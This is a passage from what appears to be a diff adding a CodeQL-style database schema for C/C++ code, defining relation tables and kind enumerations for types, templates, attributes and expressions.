+pointerishsize(unique int id: @derivedtype ref, + int size: int ref, + int alignment: int ref); + +arraysizes( + unique int id: @derivedtype ref, + int num_elements: int ref, + int bytesize: int ref, + int alignment: int ref +); + +tupleelements( + unique int id: @derivedtype ref, + int num_elements: int ref +); + +typedefbase( + unique int id: @usertype ref, + int type_id: @type ref +); + +/** + * An instance of the C++11 `decltype` operator or C23 `typeof`/`typeof_unqual` + * operator taking an expression as its argument. 
For example: + * ``` + * int a; + * decltype(1+a) b; + * typeof(1+a) c; + * ``` + * Here `expr` is `1+a`. + * + * Sometimes an additional pair of parentheses around the expression + * changes the semantics of the decltype, e.g. + * ``` + * struct A { double x; }; + * const A* a = new A(); + * decltype( a->x ); // type is double + * decltype((a->x)); // type is const double& + * ``` + * (Please consult the C++11 standard for more details). + * `parentheses_would_change_meaning` is `true` iff that is the case. + */ + +/* +case @decltype.kind of +| 0 = @decltype +| 1 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +; +*/ + +#keyset[id, expr] +decltypes( + int id: @decltype, + int expr: @expr ref, + int kind: int ref, + int base_type: @type ref, + boolean parentheses_would_change_meaning: boolean ref +); + +case @type_operator.kind of + 0 = @typeof // The frontend does not differentiate between typeof and typeof_unqual +| 1 = @underlying_type +| 2 = @bases +| 3 = @direct_bases +| 4 = @add_lvalue_reference +| 5 = @add_pointer +| 6 = @add_rvalue_reference +| 7 = @decay +| 8 = @make_signed +| 9 = @make_unsigned +| 10 = @remove_all_extents +| 11 = @remove_const +| 12 = @remove_cv +| 13 = @remove_cvref +| 14 = @remove_extent +| 15 = @remove_pointer +| 16 = @remove_reference_t +| 17 = @remove_restrict +| 18 = @remove_volatile +| 19 = @remove_reference +; + +type_operators( + unique int id: @type_operator, + int arg_type: @type ref, + int kind: int ref, + int base_type: @type ref +) + +case @usertype.kind of + 0 = @unknown_usertype +| 1 = @struct +| 2 = @class +| 3 = @union +| 4 = @enum +// ... 5 = @typedef deprecated // classic C: typedef typedef type name +// ... 6 = @template deprecated +| 7 = @template_parameter +| 8 = @template_template_parameter +| 9 = @proxy_class // a proxy class associated with a template parameter +// ... 10 objc_class deprecated +// ... 11 objc_protocol deprecated +// ... 
12 objc_category deprecated +| 13 = @scoped_enum +// ... 14 = @using_alias deprecated // a using name = type style typedef +| 15 = @template_struct +| 16 = @template_class +| 17 = @template_union +| 18 = @alias +; + +usertypes( + unique int id: @usertype, + string name: string ref, + int kind: int ref +); + +usertypesize( + unique int id: @usertype ref, + int size: int ref, + int alignment: int ref +); + +usertype_final(unique int id: @usertype ref); + +usertype_uuid( + unique int id: @usertype ref, + string uuid: string ref +); + +/* +case @usertype.alias_kind of +| 0 = @typedef +| 1 = @alias +*/ + +usertype_alias_kind( + int id: @usertype ref, + int alias_kind: int ref +) + +nontype_template_parameters( + int id: @expr ref +); + +type_template_type_constraint( + int id: @usertype ref, + int constraint: @expr ref +); + +mangled_name( + unique int id: @declaration ref, + int mangled_name : @mangledname, + boolean is_complete: boolean ref +); + +is_pod_class(unique int id: @usertype ref); +is_standard_layout_class(unique int id: @usertype ref); + +is_complete(unique int id: @usertype ref); + +is_class_template(unique int id: @usertype ref); +class_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +class_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +class_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +class_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +) + +@user_or_decltype = @usertype | @decltype; + +is_proxy_class_for( + unique int id: @usertype ref, + int templ_param_id: @user_or_decltype ref +); + +type_mentions( + unique int id: @type_mention, + int type_id: @type ref, + int location: @location_default ref, + // a_symbol_reference_kind from the frontend. 
+ int kind: int ref +); + +is_function_template(unique int id: @function ref); +function_instantiation( + unique int to: @function ref, + int from: @function ref +); +function_template_argument( + int function_id: @function ref, + int index: int ref, + int arg_type: @type ref +); +function_template_argument_value( + int function_id: @function ref, + int index: int ref, + int arg_value: @expr ref +); +function_template_generated_from( + unique int template: @function ref, + int from: @function ref +); + +is_variable_template(unique int id: @variable ref); +variable_instantiation( + unique int to: @variable ref, + int from: @variable ref +); +variable_template_argument( + int variable_id: @variable ref, + int index: int ref, + int arg_type: @type ref +); +variable_template_argument_value( + int variable_id: @variable ref, + int index: int ref, + int arg_value: @expr ref +); +variable_template_generated_from( + unique int template: @variable ref, + int from: @variable ref +); + +is_alias_template(unique int id: @usertype ref); +alias_instantiation( + unique int to: @usertype ref, + int from: @usertype ref +); +alias_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +alias_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); +alias_template_generated_from( + unique int template: @usertype ref, + int from: @usertype ref +); + +template_template_instantiation( + int to: @usertype ref, + int from: @usertype ref +); +template_template_argument( + int type_id: @usertype ref, + int index: int ref, + int arg_type: @type ref +); +template_template_argument_value( + int type_id: @usertype ref, + int index: int ref, + int arg_value: @expr ref +); + +@concept = @concept_template | @concept_id; + +concept_templates( + unique int concept_id: @concept_template, + string name: string ref, + int location: @location_default ref +); +concept_instantiation( + unique int to: 
@concept_id ref, + int from: @concept_template ref +); +is_type_constraint(int concept_id: @concept_id ref); +concept_template_argument( + int concept_id: @concept ref, + int index: int ref, + int arg_type: @type ref +); +concept_template_argument_value( + int concept_id: @concept ref, + int index: int ref, + int arg_value: @expr ref +); + +routinetypes( + unique int id: @routinetype, + int return_type: @type ref +); + +routinetypeargs( + int routine: @routinetype ref, + int index: int ref, + int type_id: @type ref +); + +ptrtomembers( + unique int id: @ptrtomember, + int type_id: @type ref, + int class_id: @type ref +); + +/* + specifiers for types, functions, and variables + + "public", + "protected", + "private", + + "const", + "volatile", + "static", + + "pure", + "virtual", + "sealed", // Microsoft + "__interface", // Microsoft + "inline", + "explicit", + + "near", // near far extension + "far", // near far extension + "__ptr32", // Microsoft + "__ptr64", // Microsoft + "__sptr", // Microsoft + "__uptr", // Microsoft + "dllimport", // Microsoft + "dllexport", // Microsoft + "thread", // Microsoft + "naked", // Microsoft + "microsoft_inline", // Microsoft + "forceinline", // Microsoft + "selectany", // Microsoft + "nothrow", // Microsoft + "novtable", // Microsoft + "noreturn", // Microsoft + "noinline", // Microsoft + "noalias", // Microsoft + "restrict", // Microsoft +*/ + +specifiers( + unique int id: @specifier, + unique string str: string ref +); + +typespecifiers( + int type_id: @type ref, + int spec_id: @specifier ref +); + +funspecifiers( + int func_id: @function ref, + int spec_id: @specifier ref +); + +varspecifiers( + int var_id: @accessible ref, + int spec_id: @specifier ref +); + +explicit_specifier_exprs( + unique int func_id: @function ref, + int constant: @expr ref +) + +attributes( + unique int id: @attribute, + int kind: int ref, + string name: string ref, + string name_space: string ref, + int location: @location_default ref +); + +case 
@attribute.kind of + 0 = @gnuattribute +| 1 = @stdattribute +| 2 = @declspec +| 3 = @msattribute +| 4 = @alignas +// ... 5 @objc_propertyattribute deprecated +; + +attribute_args( + unique int id: @attribute_arg, + int kind: int ref, + int attribute: @attribute ref, + int index: int ref, + int location: @location_default ref +); + +case @attribute_arg.kind of + 0 = @attribute_arg_empty +| 1 = @attribute_arg_token +| 2 = @attribute_arg_constant +| 3 = @attribute_arg_type +| 4 = @attribute_arg_constant_expr +| 5 = @attribute_arg_expr +; + +attribute_arg_value( + unique int arg: @attribute_arg ref, + string value: string ref +); +attribute_arg_type( + unique int arg: @attribute_arg ref, + int type_id: @type ref +); +attribute_arg_constant( + unique int arg: @attribute_arg ref, + int constant: @expr ref +) +attribute_arg_expr( + unique int arg: @attribute_arg ref, + int expr: @expr ref +) +attribute_arg_name( + unique int arg: @attribute_arg ref, + string name: string ref +); + +typeattributes( + int type_id: @type ref, + int spec_id: @attribute ref +); + +funcattributes( + int func_id: @function ref, + int spec_id: @attribute ref +); + +varattributes( + int var_id: @accessible ref, + int spec_id: @attribute ref +); + +namespaceattributes( + int namespace_id: @namespace ref, + int spec_id: @attribute ref +); + +stmtattributes( + int stmt_id: @stmt ref, + int spec_id: @attribute ref +); + +@type = @builtintype + | @derivedtype + | @usertype + | @routinetype + | @ptrtomember + | @decltype + | @type_operator; + +unspecifiedtype( + unique int type_id: @type ref, + int unspecified_type_id: @type ref +); + +member( + int parent: @type ref, + int index: int ref, + int child: @member ref +); + +@enclosingfunction_child = @usertype | @variable | @namespace + +enclosingfunction( + unique int child: @enclosingfunction_child ref, + int parent: @function ref +); + +derivations( + unique int derivation: @derivation, + int sub: @type ref, + int index: int ref, + int super: @type ref, 
+ int location: @location_default ref +); + +derspecifiers( + int der_id: @derivation ref, + int spec_id: @specifier ref +); + +/** + * Contains the byte offset of the base class subobject within the derived + * class. Only holds for non-virtual base classes, but see table + * `virtual_base_offsets` for offsets of virtual base class subobjects. + */ +direct_base_offsets( + unique int der_id: @derivation ref, + int offset: int ref +); + +/** + * Contains the byte offset of the virtual base class subobject for class + * `super` within a most-derived object of class `sub`. `super` can be either a + * direct or indirect base class. + */ +#keyset[sub, super] +virtual_base_offsets( + int sub: @usertype ref, + int super: @usertype ref, + int offset: int ref +); + +frienddecls( + unique int id: @frienddecl, + int type_id: @type ref, + int decl_id: @declaration ref, + int location: @location_default ref +); + +@declaredtype = @usertype ; + +@declaration = @function + | @declaredtype + | @variable + | @enumconstant + | @frienddecl + | @concept_template; + +@member = @membervariable + | @function + | @declaredtype + | @enumconstant; + +@locatable = @diagnostic + | @declaration + | @ppd_include + | @ppd_define + | @macroinvocation + /*| @funcall*/ + | @xmllocatable + | @attribute + | @attribute_arg; + +@namedscope = @namespace | @usertype; + +@element = @locatable + | @file + | @folder + | @specifier + | @type + | @expr + | @namespace + | @initialiser + | @stmt + | @derivation + | @comment + | @preprocdirect + | @fun_decl + | @var_decl + | @type_decl + | @namespace_decl + | @using + | @namequalifier + | @specialnamequalifyingelement + | @static_assert + | @type_mention + | @lambdacapture; + +@exprparent = @element; + +comments( + unique int id: @comment, + string contents: string ref, + int location: @location_default ref +); + +commentbinding( + int id: @comment ref, + int element: @element ref +); + +exprconv( + int converted: @expr ref, + unique int conversion: @expr ref 
+); + +compgenerated(unique int id: @element ref); + +/** + * `destructor_call` destructs the `i`'th entity that should be + * destructed following `element`. Note that entities should be + * destructed in reverse construction order, so for a given `element` + * these should be called from highest to lowest `i`. + */ +#keyset[element, destructor_call] +#keyset[element, i] +synthetic_destructor_call( + int element: @element ref, + int i: int ref, + int destructor_call: @routineexpr ref +); + +namespaces( + unique int id: @namespace, + string name: string ref +); + +namespace_inline( + unique int id: @namespace ref +); + +namespacembrs( + int parentid: @namespace ref, + unique int memberid: @namespacembr ref +); + +@namespacembr = @declaration | @namespace; + +exprparents( + int expr_id: @expr ref, + int child_index: int ref, + int parent_id: @exprparent ref +); + +expr_isload(unique int expr_id: @expr ref); + +@cast = @c_style_cast + | @const_cast + | @dynamic_cast + | @reinterpret_cast + | @static_cast + ; + +/* +case @conversion.kind of + 0 = @simple_conversion // a numeric conversion, qualification conversion, or a reinterpret_cast +| 1 = @bool_conversion // conversion to 'bool' +| 2 = @base_class_conversion // a derived-to-base conversion +| 3 = @derived_class_conversion // a base-to-derived conversion +| 4 = @pm_base_class_conversion // a derived-to-base conversion of a pointer to member +| 5 = @pm_derived_class_conversion // a base-to-derived conversion of a pointer to member +| 6 = @glvalue_adjust // an adjustment of the type of a glvalue +| 7 = @prvalue_adjust // an adjustment of the type of a prvalue +; +*/ +/** + * Describes the semantics represented by a cast expression. This is largely + * independent of the source syntax of the cast, so it is separate from the + * regular expression kind. 
+ */ +conversionkinds( + unique int expr_id: @cast ref, + int kind: int ref +); + +@conversion = @cast + | @array_to_pointer + | @parexpr + | @reference_to + | @ref_indirect + | @temp_init + | @c11_generic + ; + +/* +case @funbindexpr.kind of + 0 = @normal_call // a normal call +| 1 = @virtual_call // a virtual call +| 2 = @adl_call // a call whose target is only found by ADL +; +*/ +iscall( + unique int caller: @funbindexpr ref, + int kind: int ref +); + +numtemplatearguments( + unique int expr_id: @expr ref, + int num: int ref +); + +specialnamequalifyingelements( + unique int id: @specialnamequalifyingelement, + unique string name: string ref +); + +@namequalifiableelement = @expr | @namequalifier; +@namequalifyingelement = @namespace + | @specialnamequalifyingelement + | @usertype + | @decltype + | @derivedtype; + +namequalifiers( + unique int id: @namequalifier, + unique int qualifiableelement: @namequalifiableelement ref, + int qualifyingelement: @namequalifyingelement ref, + int location: @location_default ref +); + +varbind( + int expr: @varbindexpr ref, + int var: @accessible ref +); + +funbind( + int expr: @funbindexpr ref, + int fun: @function ref +); + +@any_new_expr = @new_expr + | @new_array_expr; + +@new_or_delete_expr = @any_new_expr + | @delete_expr + | @delete_array_expr; + +@prefix_crement_expr = @preincrexpr | @predecrexpr; + +@postfix_crement_expr = @postincrexpr | @postdecrexpr; + +@increment_expr = @preincrexpr | @postincrexpr; + +@decrement_expr = @predecrexpr | @postdecrexpr; + +@crement_expr = @increment_expr | @decrement_expr; + +@un_arith_op_expr = @arithnegexpr + | @unaryplusexpr + | @conjugation + | @realpartexpr + | @imagpartexpr + | @crement_expr + ; + +@un_bitwise_op_expr = @complementexpr; + +@un_log_op_expr = @notexpr; + +@un_op_expr = @address_of + | @indirect + | @un_arith_op_expr + | @un_bitwise_op_expr + | @builtinaddressof + | @vec_fill + | @un_log_op_expr + | @co_await + | @co_yield + ; + +@bin_log_op_expr = @andlogicalexpr 
| @orlogicalexpr; + +@cmp_op_expr = @eq_op_expr | @rel_op_expr; + +@eq_op_expr = @eqexpr | @neexpr; + +@rel_op_expr = @gtexpr + | @ltexpr + | @geexpr + | @leexpr + | @spaceshipexpr + ; + +@bin_bitwise_op_expr = @lshiftexpr + | @rshiftexpr + | @andexpr + | @orexpr + | @xorexpr + ; + +@p_arith_op_expr = @paddexpr + | @psubexpr + | @pdiffexpr + ; + +@bin_arith_op_expr = @addexpr + | @subexpr + | @mulexpr + | @divexpr + | @remexpr + | @jmulexpr + | @jdivexpr + | @fjaddexpr + | @jfaddexpr + | @fjsubexpr + | @jfsubexpr + | @minexpr + | @maxexpr + | @p_arith_op_expr + ; + +@bin_op_expr = @bin_arith_op_expr + | @bin_bitwise_op_expr + | @cmp_op_expr + | @bin_log_op_expr + ; + +@op_expr = @un_op_expr + | @bin_op_expr + | @assign_expr + | @conditionalexpr + ; + +@assign_arith_expr = @assignaddexpr + | @assignsubexpr + | @assignmulexpr + | @assigndivexpr + | @assignremexpr + ; + +@assign_bitwise_expr = @assignandexpr + | @assignorexpr + | @assignxorexpr + | @assignlshiftexpr + | @assignrshiftexpr + ; + +@assign_pointer_expr = @assignpaddexpr + | @assignpsubexpr + ; + +@assign_op_expr = @assign_arith_expr + | @assign_bitwise_expr + | @assign_pointer_expr + ; + +@assign_expr = @assignexpr | @assign_op_expr | @blockassignexpr + +/* + Binary encoding of the allocator form. + + case @allocator.form of + 0 = plain + | 1 = alignment + ; +*/ + +/** + * The allocator function associated with a `new` or `new[]` expression. + * The `form` column specified whether the allocation call contains an alignment + * argument. + */ +expr_allocator( + unique int expr: @any_new_expr ref, + int func: @function ref, + int form: int ref +); + +/* + Binary encoding of the deallocator form. + + case @deallocator.form of + 0 = plain + | 1 = size + | 2 = alignment + | 4 = destroying_delete + ; +*/ + +/** + * The deallocator function associated with a `delete`, `delete[]`, `new`, or + * `new[]` expression. 
For a `new` or `new[]` expression, the deallocator is the + * one used to free memory if the initialization throws an exception. + * The `form` column specifies whether the deallocation call contains a size + * argument, and alignment argument, or both. + */ +expr_deallocator( + unique int expr: @new_or_delete_expr ref, + int func: @function ref, + int form: int ref +); + +/** + * Holds if the `@conditionalexpr` is of the two operand form + * `guard ? : false`. + */ +expr_cond_two_operand( + unique int cond: @conditionalexpr ref +); + +/** + * The guard of `@conditionalexpr` `guard ? true : false` + */ +expr_cond_guard( + unique int cond: @conditionalexpr ref, + int guard: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` holds. For the two operand form + * `guard ?: false` consider using `expr_cond_guard` instead. + */ +expr_cond_true( + unique int cond: @conditionalexpr ref, + int true: @expr ref +); + +/** + * The expression used when the guard of `@conditionalexpr` + * `guard ? true : false` does not hold. + */ +expr_cond_false( + unique int cond: @conditionalexpr ref, + int false: @expr ref +); + +/** A string representation of the value. */ +values( + unique int id: @value, + string str: string ref +); + +/** The actual text in the source code for the value, if any. 
*/ +valuetext( + unique int id: @value ref, + string text: string ref +); + +valuebind( + int val: @value ref, + unique int expr: @expr ref +); + +fieldoffsets( + unique int id: @variable ref, + int byteoffset: int ref, + int bitoffset: int ref +); + +bitfield( + unique int id: @variable ref, + int bits: int ref, + int declared_bits: int ref +); + +/* TODO +memberprefix( + int member: @expr ref, + int prefix: @expr ref +); +*/ + +/* + kind(1) = mbrcallexpr + kind(2) = mbrptrcallexpr + kind(3) = mbrptrmbrcallexpr + kind(4) = ptrmbrptrmbrcallexpr + kind(5) = mbrreadexpr // x.y + kind(6) = mbrptrreadexpr // p->y + kind(7) = mbrptrmbrreadexpr // x.*pm + kind(8) = mbrptrmbrptrreadexpr // x->*pm + kind(9) = staticmbrreadexpr // static x.y + kind(10) = staticmbrptrreadexpr // static p->y +*/ +/* TODO +memberaccess( + int member: @expr ref, + int kind: int ref +); +*/ + +initialisers( + unique int init: @initialiser, + int var: @accessible ref, + unique int expr: @expr ref, + int location: @location_default ref +); + +braced_initialisers( + int init: @initialiser ref +); + +/** + * An ancestor for the expression, for cases in which we cannot + * otherwise find the expression's parent. + */ +expr_ancestor( + int exp: @expr ref, + int ancestor: @element ref +); + +exprs( + unique int id: @expr, + int kind: int ref, + int location: @location_default ref +); + +expr_reuse( + int reuse: @expr ref, + int original: @expr ref, + int value_category: int ref +) + +/* + case @value.category of + 1 = prval + | 2 = xval + | 3 = lval + ; +*/ +expr_types( + int id: @expr ref, + int typeid: @type ref, + int value_category: int ref +); + +case @expr.kind of + 1 = @errorexpr +| 2 = @address_of // & AddressOfExpr +| 3 = @reference_to // ReferenceToExpr (implicit?) +| 4 = @indirect // * PointerDereferenceExpr +| 5 = @ref_indirect // ReferenceDereferenceExpr (implicit?) +// ... +| 8 = @array_to_pointer // (???) +| 9 = @vacuous_destructor_call // VacuousDestructorCall +// ... 
+| 11 = @assume // Microsoft +| 12 = @parexpr +| 13 = @arithnegexpr +| 14 = @unaryplusexpr +| 15 = @complementexpr +| 16 = @notexpr +| 17 = @conjugation // GNU ~ operator +| 18 = @realpartexpr // GNU __real +| 19 = @imagpartexpr // GNU __imag +| 20 = @postincrexpr +| 21 = @postdecrexpr +| 22 = @preincrexpr +| 23 = @predecrexpr +| 24 = @conditionalexpr +| 25 = @addexpr +| 26 = @subexpr +| 27 = @mulexpr +| 28 = @divexpr +| 29 = @remexpr +| 30 = @jmulexpr // C99 mul imaginary +| 31 = @jdivexpr // C99 div imaginary +| 32 = @fjaddexpr // C99 add real + imaginary +| 33 = @jfaddexpr // C99 add imaginary + real +| 34 = @fjsubexpr // C99 sub real - imaginary +| 35 = @jfsubexpr // C99 sub imaginary - real +| 36 = @paddexpr // pointer add (pointer + int or int + pointer) +| 37 = @psubexpr // pointer sub (pointer - integer) +| 38 = @pdiffexpr // difference between two pointers +| 39 = @lshiftexpr +| 40 = @rshiftexpr +| 41 = @andexpr +| 42 = @orexpr +| 43 = @xorexpr +| 44 = @eqexpr +| 45 = @neexpr +| 46 = @gtexpr +| 47 = @ltexpr +| 48 = @geexpr +| 49 = @leexpr +| 50 = @minexpr // GNU minimum +| 51 = @maxexpr // GNU maximum +| 52 = @assignexpr +| 53 = @assignaddexpr +| 54 = @assignsubexpr +| 55 = @assignmulexpr +| 56 = @assigndivexpr +| 57 = @assignremexpr +| 58 = @assignlshiftexpr +| 59 = @assignrshiftexpr +| 60 = @assignandexpr +| 61 = @assignorexpr +| 62 = @assignxorexpr +| 63 = @assignpaddexpr // assign pointer add +| 64 = @assignpsubexpr // assign pointer sub +| 65 = @andlogicalexpr +| 66 = @orlogicalexpr +| 67 = @commaexpr +| 68 = @subscriptexpr // access to member of an array, e.g., a[5] +// ... 69 @objc_subscriptexpr deprecated +// ... 70 @cmdaccess deprecated +// ... +| 73 = @virtfunptrexpr +| 74 = @callexpr +// ... 75 @msgexpr_normal deprecated +// ... 76 @msgexpr_super deprecated +// ... 77 @atselectorexpr deprecated +// ... 78 @atprotocolexpr deprecated +| 79 = @vastartexpr +| 80 = @vaargexpr +| 81 = @vaendexpr +| 82 = @vacopyexpr +// ... 
83 @atencodeexpr deprecated +| 84 = @varaccess +| 85 = @thisaccess +// ... 86 @objc_box_expr deprecated +| 87 = @new_expr +| 88 = @delete_expr +| 89 = @throw_expr +| 90 = @condition_decl // a variable declared in a condition, e.g., if(int x = y > 2) +| 91 = @braced_init_list +| 92 = @type_id +| 93 = @runtime_sizeof +| 94 = @runtime_alignof +| 95 = @sizeof_pack +| 96 = @expr_stmt // GNU extension +| 97 = @routineexpr +| 98 = @type_operand // used to access a type in certain contexts (haven't found any examples yet....) +| 99 = @offsetofexpr // offsetof ::= type and field +| 100 = @hasassignexpr // __has_assign ::= type +| 101 = @hascopyexpr // __has_copy ::= type +| 102 = @hasnothrowassign // __has_nothrow_assign ::= type +| 103 = @hasnothrowconstr // __has_nothrow_constructor ::= type +| 104 = @hasnothrowcopy // __has_nothrow_copy ::= type +| 105 = @hastrivialassign // __has_trivial_assign ::= type +| 106 = @hastrivialconstr // __has_trivial_constructor ::= type +| 107 = @hastrivialcopy // __has_trivial_copy ::= type +| 108 = @hasuserdestr // __has_user_destructor ::= type +| 109 = @hasvirtualdestr // __has_virtual_destructor ::= type +| 110 = @isabstractexpr // __is_abstract ::= type +| 111 = @isbaseofexpr // __is_base_of ::= type type +| 112 = @isclassexpr // __is_class ::= type +| 113 = @isconvtoexpr // __is_convertible_to ::= type type +| 114 = @isemptyexpr // __is_empty ::= type +| 115 = @isenumexpr // __is_enum ::= type +| 116 = @ispodexpr // __is_pod ::= type +| 117 = @ispolyexpr // __is_polymorphic ::= type +| 118 = @isunionexpr // __is_union ::= type +| 119 = @typescompexpr // GNU __builtin_types_compatible ::= type type +| 120 = @intaddrexpr // frontend internal builtin, used to implement offsetof +// ... +| 122 = @hastrivialdestructor // __has_trivial_destructor ::= type +| 123 = @literal +| 124 = @uuidof +| 127 = @aggregateliteral +| 128 = @delete_array_expr +| 129 = @new_array_expr +// ... 130 @objc_array_literal deprecated +// ... 
131 @objc_dictionary_literal deprecated +| 132 = @foldexpr +// ... +| 200 = @ctordirectinit +| 201 = @ctorvirtualinit +| 202 = @ctorfieldinit +| 203 = @ctordelegatinginit +| 204 = @dtordirectdestruct +| 205 = @dtorvirtualdestruct +| 206 = @dtorfielddestruct +// ... +| 210 = @static_cast +| 211 = @reinterpret_cast +| 212 = @const_cast +| 213 = @dynamic_cast +| 214 = @c_style_cast +| 215 = @lambdaexpr +| 216 = @param_ref +| 217 = @noopexpr +// ... +| 294 = @istriviallyconstructibleexpr +| 295 = @isdestructibleexpr +| 296 = @isnothrowdestructibleexpr +| 297 = @istriviallydestructibleexpr +| 298 = @istriviallyassignableexpr +| 299 = @isnothrowassignableexpr +| 300 = @istrivialexpr +| 301 = @isstandardlayoutexpr +| 302 = @istriviallycopyableexpr +| 303 = @isliteraltypeexpr +| 304 = @hastrivialmoveconstructorexpr +| 305 = @hastrivialmoveassignexpr +| 306 = @hasnothrowmoveassignexpr +| 307 = @isconstructibleexpr +| 308 = @isnothrowconstructibleexpr +| 309 = @hasfinalizerexpr +| 310 = @isdelegateexpr +| 311 = @isinterfaceclassexpr +| 312 = @isrefarrayexpr +| 313 = @isrefclassexpr +| 314 = @issealedexpr +| 315 = @issimplevalueclassexpr +| 316 = @isvalueclassexpr +| 317 = @isfinalexpr +| 319 = @noexceptexpr +| 320 = @builtinshufflevector +| 321 = @builtinchooseexpr +| 322 = @builtinaddressof +| 323 = @vec_fill +| 324 = @builtinconvertvector +| 325 = @builtincomplex +| 326 = @spaceshipexpr +| 327 = @co_await +| 328 = @co_yield +| 329 = @temp_init +| 330 = @isassignable +| 331 = @isaggregate +| 332 = @hasuniqueobjectrepresentations +| 333 = @builtinbitcast +| 334 = @builtinshuffle +| 335 = @blockassignexpr +| 336 = @issame +| 337 = @isfunction +| 338 = @islayoutcompatible +| 339 = @ispointerinterconvertiblebaseof +| 340 = @isarray +| 341 = @arrayrank +| 342 = @arrayextent +| 343 = @isarithmetic +| 344 = @iscompletetype +| 345 = @iscompound +| 346 = @isconst +| 347 = @isfloatingpoint +| 348 = @isfundamental +| 349 = @isintegral +| 350 = @islvaluereference +| 351 = 
@ismemberfunctionpointer +| 352 = @ismemberobjectpointer +| 353 = @ismemberpointer +| 354 = @isobject +| 355 = @ispointer +| 356 = @isreference +| 357 = @isrvaluereference +| 358 = @isscalar +| 359 = @issigned +| 360 = @isunsigned +| 361 = @isvoid +| 362 = @isvolatile +| 363 = @reuseexpr +| 364 = @istriviallycopyassignable +| 365 = @isassignablenopreconditioncheck +| 366 = @referencebindstotemporary +| 367 = @issameas +| 368 = @builtinhasattribute +| 369 = @ispointerinterconvertiblewithclass +| 370 = @builtinispointerinterconvertiblewithclass +| 371 = @iscorrespondingmember +| 372 = @builtiniscorrespondingmember +| 373 = @isboundedarray +| 374 = @isunboundedarray +| 375 = @isreferenceable +| 378 = @isnothrowconvertible +| 379 = @referenceconstructsfromtemporary +| 380 = @referenceconvertsfromtemporary +| 381 = @isconvertible +| 382 = @isvalidwinrttype +| 383 = @iswinclass +| 384 = @iswininterface +| 385 = @istriviallyequalitycomparable +| 386 = @isscopedenum +| 387 = @istriviallyrelocatable +| 388 = @datasizeof +| 389 = @c11_generic +| 390 = @requires_expr +| 391 = @nested_requirement +| 392 = @compound_requirement +| 393 = @concept_id +| 394 = @isinvocable +| 395 = @isnothrowinvocable +| 396 = @isbitwisecloneable +; + +@var_args_expr = @vastartexpr + | @vaendexpr + | @vaargexpr + | @vacopyexpr + ; + +@builtin_op = @var_args_expr + | @noopexpr + | @offsetofexpr + | @intaddrexpr + | @hasassignexpr + | @hascopyexpr + | @hasnothrowassign + | @hasnothrowconstr + | @hasnothrowcopy + | @hastrivialassign + | @hastrivialconstr + | @hastrivialcopy + | @hastrivialdestructor + | @hasuserdestr + | @hasvirtualdestr + | @isabstractexpr + | @isbaseofexpr + | @isclassexpr + | @isconvtoexpr + | @isemptyexpr + | @isenumexpr + | @ispodexpr + | @ispolyexpr + | @isunionexpr + | @typescompexpr + | @builtinshufflevector + | @builtinconvertvector + | @builtinaddressof + | @istriviallyconstructibleexpr + | @isdestructibleexpr + | @isnothrowdestructibleexpr + | @istriviallydestructibleexpr 
+ | @istriviallyassignableexpr + | @isnothrowassignableexpr + | @istrivialexpr + | @isstandardlayoutexpr + | @istriviallycopyableexpr + | @isliteraltypeexpr + | @hastrivialmoveconstructorexpr + | @hastrivialmoveassignexpr + | @hasnothrowmoveassignexpr + | @isconstructibleexpr + | @isnothrowconstructibleexpr + | @hasfinalizerexpr + | @isdelegateexpr + | @isinterfaceclassexpr + | @isrefarrayexpr + | @isrefclassexpr + | @issealedexpr + | @issimplevalueclassexpr + | @isvalueclassexpr + | @isfinalexpr + | @builtinchooseexpr + | @builtincomplex + | @isassignable + | @isaggregate + | @hasuniqueobjectrepresentations + | @builtinbitcast + | @builtinshuffle + | @issame + | @isfunction + | @islayoutcompatible + | @ispointerinterconvertiblebaseof + | @isarray + | @arrayrank + | @arrayextent + | @isarithmetic + | @iscompletetype + | @iscompound + | @isconst + | @isfloatingpoint + | @isfundamental + | @isintegral + | @islvaluereference + | @ismemberfunctionpointer + | @ismemberobjectpointer + | @ismemberpointer + | @isobject + | @ispointer + | @isreference + | @isrvaluereference + | @isscalar + | @issigned + | @isunsigned + | @isvoid + | @isvolatile + | @istriviallycopyassignable + | @isassignablenopreconditioncheck + | @referencebindstotemporary + | @issameas + | @builtinhasattribute + | @ispointerinterconvertiblewithclass + | @builtinispointerinterconvertiblewithclass + | @iscorrespondingmember + | @builtiniscorrespondingmember + | @isboundedarray + | @isunboundedarray + | @isreferenceable + | @isnothrowconvertible + | @referenceconstructsfromtemporary + | @referenceconvertsfromtemporary + | @isconvertible + | @isvalidwinrttype + | @iswinclass + | @iswininterface + | @istriviallyequalitycomparable + | @isscopedenum + | @istriviallyrelocatable + | @isinvocable + | @isnothrowinvocable + | @isbitwisecloneable + ; + +compound_requirement_is_noexcept( + int expr: @compound_requirement ref +); + +new_allocated_type( + unique int expr: @new_expr ref, + int type_id: @type ref +); + 
+new_array_allocated_type( + unique int expr: @new_array_expr ref, + int type_id: @type ref +); + +param_ref_to_this( + int expr: @param_ref ref +) + +/** + * The field being initialized by an initializer expression within an aggregate + * initializer for a class/struct/union. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_field_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int field: @membervariable ref, + int position: int ref, + boolean is_designated: boolean ref +); + +/** + * The index of the element being initialized by an initializer expression + * within an aggregate initializer for an array. Position is used to sort repeated initializers. + */ +#keyset[aggregate, position] +aggregate_array_init( + int aggregate: @aggregateliteral ref, + int initializer: @expr ref, + int element_index: int ref, + int position: int ref, + boolean is_designated: boolean ref +); + +@ctorinit = @ctordirectinit + | @ctorvirtualinit + | @ctorfieldinit + | @ctordelegatinginit; +@dtordestruct = @dtordirectdestruct + | @dtorvirtualdestruct + | @dtorfielddestruct; + + +condition_decl_bind( + unique int expr: @condition_decl ref, + unique int decl: @declaration ref +); + +typeid_bind( + unique int expr: @type_id ref, + int type_id: @type ref +); + +uuidof_bind( + unique int expr: @uuidof ref, + int type_id: @type ref +); + +@sizeof_or_alignof = @runtime_sizeof | @runtime_alignof | @datasizeof | @sizeof_pack; + 